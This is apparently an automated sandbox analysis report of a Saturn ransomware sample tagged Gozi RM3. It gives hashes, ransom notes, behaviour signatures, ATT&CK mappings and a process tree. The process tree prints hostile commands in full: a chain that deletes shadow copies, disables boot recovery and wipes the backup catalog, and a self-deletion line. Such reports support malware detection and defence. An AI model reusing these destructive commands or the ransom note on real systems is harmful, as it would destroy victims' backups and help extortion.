gozi_rm3 | 096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f

General

Target

096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
Size

499KB
MD5

1004596e635c155c0b073d3d76349985
SHA1

fba141902dfc4a7331b9f9748e6f36b7dcb623f7
SHA256

096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f
SHA512

5c7afcc7bed629659ed0c02313e88255f0c2d58400c73d5aa1f860a64ffac77936e299e4be54ca59174f820d103fcc6c39e066ef1a1bc81bbbd40cd49f8d4568

Score

10^/10

gozi_rm3 banker evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\#DECRYPT_MY_FILES#.txt

Ransom Note

S A T U R N All of your files have been encrypted! To Decrypt your files follow these steps: #---------------------------------------------# 1. Download and install the "Tor Browser" from https://www.torproject.org 2. Run it. 3. In the Tor Browser, open website: http://su34pwhpcafeiztt.onion 4. Follow the instructions on the page #---------------------------------------------#

URLs

http://su34pwhpcafeiztt.onion

Extracted

Path

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\#DECRYPT_MY_FILES#.html

Ransom Note

<html> <title>S A T U R N</title> <center> <body> <h1>S A T U R N</h1> <h4>Your documents, photos, databases, and other important files have been encrypted!</h4> <br /> To Decrypt your files follow these instructions: <br /> <div> <h4>1. Download and Install Tor Browser from <a href=https://www.torproject.org/>https://www.torproject.org/</a></h4> <br /> <h4>2. Run the browser</h4> <br /> <h4>3. In the Tor Browser, open website:</h3> <div style="background-color: #d9d9d9; margin-left: 20px; margin-right: 20px; padding-bottom: 8px; padding-left: 8px; padding-right: 8px; padding-top: 8px;"> </a><b>http://su34pwhpcafeiztt.onion</b><br/> </div> <h4>4. Follow the instructions at this website</h4> </div> </body> </center> </html> <style> html { background-color: white; font-family: Helvetica, sans-serif; } div { background-color: #f2f2f2; width: 80: %; padding: 25px; margin: 25px; overflow:hidden; } </style>

Signatures

Gozi RM3
A heavily modified version of Gozi using RM3 loader.
banker trojan gozi_rm3
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Enumerates VirtualBox registry keys 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Modifies extensions of user files 19 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\RemoveWrite.tiff => C:\Users\Admin\Pictures\RemoveWrite.tiff.saturn	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File renamed	C:\Users\Admin\Pictures\SearchTrace.raw => C:\Users\Admin\Pictures\SearchTrace.raw.saturn	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File created	C:\Users\Admin\Pictures\SearchWatch.tiff.tmpG	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File opened for modification	C:\Users\Admin\Pictures\SearchWatch.tiff.tmpG	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File created	C:\Users\Admin\Pictures\SendConvertTo.tif.tmpo	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File renamed	C:\Users\Admin\Pictures\RegisterSkip.png => C:\Users\Admin\Pictures\RegisterSkip.png.saturn	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File created	C:\Users\Admin\Pictures\RemoveWrite.tiff.tmpY	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File opened for modification	C:\Users\Admin\Pictures\RemoveWrite.tiff	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File created	C:\Users\Admin\Pictures\RegisterSkip.png.tmpS	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File renamed	C:\Users\Admin\Pictures\SearchWatch.tiff => C:\Users\Admin\Pictures\SearchWatch.tiff.saturn	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File renamed	C:\Users\Admin\Pictures\SendConvertTo.tif => C:\Users\Admin\Pictures\SendConvertTo.tif.saturn	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File renamed	C:\Users\Admin\Pictures\SearchWatch.tiff.tmpG => C:\Users\Admin\Pictures\SearchWatch.tiff	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File opened for modification	C:\Users\Admin\Pictures\SendConvertTo.tif.tmpo	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File renamed	C:\Users\Admin\Pictures\RemoveWrite.tiff.tmpY => C:\Users\Admin\Pictures\RemoveWrite.tiff	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File created	C:\Users\Admin\Pictures\SearchTrace.raw.tmp9	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File opened for modification	C:\Users\Admin\Pictures\SearchWatch.tiff	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File opened for modification	C:\Users\Admin\Pictures\RegisterSkip.png.tmpS	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File opened for modification	C:\Users\Admin\Pictures\RemoveWrite.tiff.tmpY	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File opened for modification	C:\Users\Admin\Pictures\SearchTrace.raw.tmp9	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1896 cmd.exe

pid	process
1896	cmd.exe

Drops startup file 3 IoCs

Processes:

096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2fcdf8f18fe1.lnk	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\#DECRYPT_MY_FILES#.txt	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\#DECRYPT_MY_FILES#.html	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\#DECRYPT_MY_FILES#.BMP"	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\My Wallpaper.jpg"	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1928 vssadmin.exe

pid	process
1928	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80120eba5b74d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004863fcdc101a3947b120786fa95ba35b00000000020000000000106600000001000020000000bd6a84800fb8b964f97852b104b112af5be39fd0d2ca43e8ebe8df1ee30cc3bb000000000e80000000020000200000006987811ca7861f68fe9261c29b5fceb6c5dcc02db0066defe211ede29667417e200000003f51825f04a8f302e9eef76e31186e354f7b674d5f96e94ac7b2e0994e9f5b6e40000000974ea4ebc09ff94ce98e2067c026a76d80cbd1a799b2a3bcaa51a57a09e9a4b0f622b021b8fba993db0c91617e035a277385051164e33c583038e032d5413efc	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "360703975"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E18C1E11-E04E-11EC-85FC-5EFF8A6DE4BC} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004863fcdc101a3947b120786fa95ba35b000000000200000000001066000000010000200000001ac21675871cc4146fd3750045190148e2bf8f720d0e62c2dfc4e53ca3891b47000000000e80000000020000200000008fa40c32e2661a95efe99c6f6902682db70beb554a09701bfa45c67c36dbf99290000000803b3638e15291d3aa0139a231810374d36aaefe3be97ab710ce7937752837f679ecbbfc1f5584666d4686788e0a660dc38844075c3050a77c8a67946004a1eb64e9db0562b84096d1e47afd641cbe83183b69297533d65a383e6a4dbdeaf3262ec431922f7e97a59a2ba6ec5178f7ed06da401f8ae8c82a2188ddf2e26333ef718ce2c7e5fe5af034ac1b81580625b84000000031be5b5490a5f2346639ab2b21268115e7b7ba55b0ec3323f1ab8f3fd03b86ad10dcc909ce51df895e04d7d5e7e01d43e7f037b332732bab88a8534e7cc0be25	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1304 PING.EXE

pid	process
1304	PING.EXE

Suspicious use of AdjustPrivilegeToken 47 IoCs

Processes:

vssvc.exeWMIC.exeAUDIODG.EXE

description	pid	process
Token: SeBackupPrivilege	992	vssvc.exe
Token: SeRestorePrivilege	992	vssvc.exe
Token: SeAuditPrivilege	992	vssvc.exe
Token: SeIncreaseQuotaPrivilege	944	WMIC.exe
Token: SeSecurityPrivilege	944	WMIC.exe
Token: SeTakeOwnershipPrivilege	944	WMIC.exe
Token: SeLoadDriverPrivilege	944	WMIC.exe
Token: SeSystemProfilePrivilege	944	WMIC.exe
Token: SeSystemtimePrivilege	944	WMIC.exe
Token: SeProfSingleProcessPrivilege	944	WMIC.exe
Token: SeIncBasePriorityPrivilege	944	WMIC.exe
Token: SeCreatePagefilePrivilege	944	WMIC.exe
Token: SeBackupPrivilege	944	WMIC.exe
Token: SeRestorePrivilege	944	WMIC.exe
Token: SeShutdownPrivilege	944	WMIC.exe
Token: SeDebugPrivilege	944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	944	WMIC.exe
Token: SeRemoteShutdownPrivilege	944	WMIC.exe
Token: SeUndockPrivilege	944	WMIC.exe
Token: SeManageVolumePrivilege	944	WMIC.exe
Token: 33	944	WMIC.exe
Token: 34	944	WMIC.exe
Token: 35	944	WMIC.exe
Token: SeIncreaseQuotaPrivilege	944	WMIC.exe
Token: SeSecurityPrivilege	944	WMIC.exe
Token: SeTakeOwnershipPrivilege	944	WMIC.exe
Token: SeLoadDriverPrivilege	944	WMIC.exe
Token: SeSystemProfilePrivilege	944	WMIC.exe
Token: SeSystemtimePrivilege	944	WMIC.exe
Token: SeProfSingleProcessPrivilege	944	WMIC.exe
Token: SeIncBasePriorityPrivilege	944	WMIC.exe
Token: SeCreatePagefilePrivilege	944	WMIC.exe
Token: SeBackupPrivilege	944	WMIC.exe
Token: SeRestorePrivilege	944	WMIC.exe
Token: SeShutdownPrivilege	944	WMIC.exe
Token: SeDebugPrivilege	944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	944	WMIC.exe
Token: SeRemoteShutdownPrivilege	944	WMIC.exe
Token: SeUndockPrivilege	944	WMIC.exe
Token: SeManageVolumePrivilege	944	WMIC.exe
Token: 33	944	WMIC.exe
Token: 34	944	WMIC.exe
Token: 35	944	WMIC.exe
Token: 33	1544	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1544	AUDIODG.EXE
Token: 33	1544	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1544	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1796 iexplore.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

iexplore.exe

pid process

1796 iexplore.exe
1796 iexplore.exe

pid	process
1796	iexplore.exe

pid	process
1796	iexplore.exe
1796	iexplore.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.execmd.execmd.exeiexplore.exe

description	pid	process	target process
PID 1672 wrote to memory of 1580	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	cmd.exe
PID 1672 wrote to memory of 1580	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	cmd.exe
PID 1672 wrote to memory of 1580	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	cmd.exe
PID 1672 wrote to memory of 1580	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	cmd.exe
PID 1580 wrote to memory of 1928	1580	cmd.exe	vssadmin.exe
PID 1580 wrote to memory of 1928	1580	cmd.exe	vssadmin.exe
PID 1580 wrote to memory of 1928	1580	cmd.exe	vssadmin.exe
PID 1580 wrote to memory of 1928	1580	cmd.exe	vssadmin.exe
PID 1580 wrote to memory of 944	1580	cmd.exe	WMIC.exe
PID 1580 wrote to memory of 944	1580	cmd.exe	WMIC.exe
PID 1580 wrote to memory of 944	1580	cmd.exe	WMIC.exe
PID 1580 wrote to memory of 944	1580	cmd.exe	WMIC.exe
PID 1672 wrote to memory of 1312	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	NOTEPAD.EXE
PID 1672 wrote to memory of 1312	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	NOTEPAD.EXE
PID 1672 wrote to memory of 1312	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	NOTEPAD.EXE
PID 1672 wrote to memory of 1312	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	NOTEPAD.EXE
PID 1672 wrote to memory of 1320	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	WScript.exe
PID 1672 wrote to memory of 1320	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	WScript.exe
PID 1672 wrote to memory of 1320	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	WScript.exe
PID 1672 wrote to memory of 1320	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	WScript.exe
PID 1672 wrote to memory of 1796	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	iexplore.exe
PID 1672 wrote to memory of 1796	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	iexplore.exe
PID 1672 wrote to memory of 1796	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	iexplore.exe
PID 1672 wrote to memory of 1796	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	iexplore.exe
PID 1672 wrote to memory of 1896	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	cmd.exe
PID 1672 wrote to memory of 1896	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	cmd.exe
PID 1672 wrote to memory of 1896	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	cmd.exe
PID 1672 wrote to memory of 1896	1672	096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe	cmd.exe
PID 1896 wrote to memory of 1304	1896	cmd.exe	PING.EXE
PID 1896 wrote to memory of 1304	1896	cmd.exe	PING.EXE
PID 1896 wrote to memory of 1304	1896	cmd.exe	PING.EXE
PID 1896 wrote to memory of 1304	1896	cmd.exe	PING.EXE
PID 1796 wrote to memory of 984	1796	iexplore.exe	IEXPLORE.EXE
PID 1796 wrote to memory of 984	1796	iexplore.exe	IEXPLORE.EXE
PID 1796 wrote to memory of 984	1796	iexplore.exe	IEXPLORE.EXE
PID 1796 wrote to memory of 984	1796	iexplore.exe	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe
"C:\Users\Admin\AppData\Local\Temp\096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe"
1⤵
- Modifies extensions of user files
- Checks BIOS information in registry
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet & wmic.exe shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1928

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic.exe shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:944

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.txt
2⤵
PID:1312

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.vbs"
2⤵
PID:1320

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.html
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1796

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1796 CREDAT:275457 /prefetch:2
3⤵
- Modifies Internet Explorer settings
PID:984

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\096bb2bde62238273995a3a4446818a4b6b7df00fadb7ea3d068d88ca8e2798f.exe"
2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
3⤵
- Runs ping.exe
PID:1304

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:1904

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x568
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

2

T1107

Virtualization/Sandbox Evasion

2

T1497

Modify Registry

2

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

3

T1012

Virtualization/Sandbox Evasion

2

T1497

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.txt
Filesize
407B

MD5
f3d19c544c10a8337a7d9f7aef079a43

SHA1
252612bbdbdbe790853fe560ce5ce8e1df5fcdc5

SHA256
b660c9236f4d6d9b62eb04b40599e852f979dd3dbfd1d03e545a287fe8e5d32b

SHA512
c5cd69e7134f6d587d0823f6e7f9e5ba6affd75f5398fcea96e299dfb57996234ba87abe4632b2de807a4b79bbafd1b1132ae55b18a815eb8c4112b48942fb1b

Download Submit
C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.vbs
Filesize
185B

MD5
23e0e8c821b40253c04d561a6d06e253

SHA1
5df1808c8485ad1d90f1431adfa2694dbb1ed693

SHA256
54905816b33af2b53b2e127e0a7db664d126700b3fdd360894b9d924544f639a

SHA512
87a57f1615db68d57381b1a8602c92e57e3a8bf447ed842f410e50efd13a7f7ba44998b00d5e54238f09cad24ffe59c3aa788c1390364c465c761f3da6a688e8

Download Submit
memory/944-58-0x0000000000000000-mapping.dmp

Download
memory/1304-66-0x0000000000000000-mapping.dmp

Download
memory/1312-59-0x0000000000000000-mapping.dmp

Download
memory/1320-61-0x0000000000000000-mapping.dmp

Download
memory/1580-56-0x0000000000000000-mapping.dmp

Download
memory/1672-54-0x00000000763C1000-0x00000000763C3000-memory.dmp

Filesize
8KB

Download
memory/1672-55-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1896-65-0x0000000000000000-mapping.dmp

Download
memory/1928-57-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads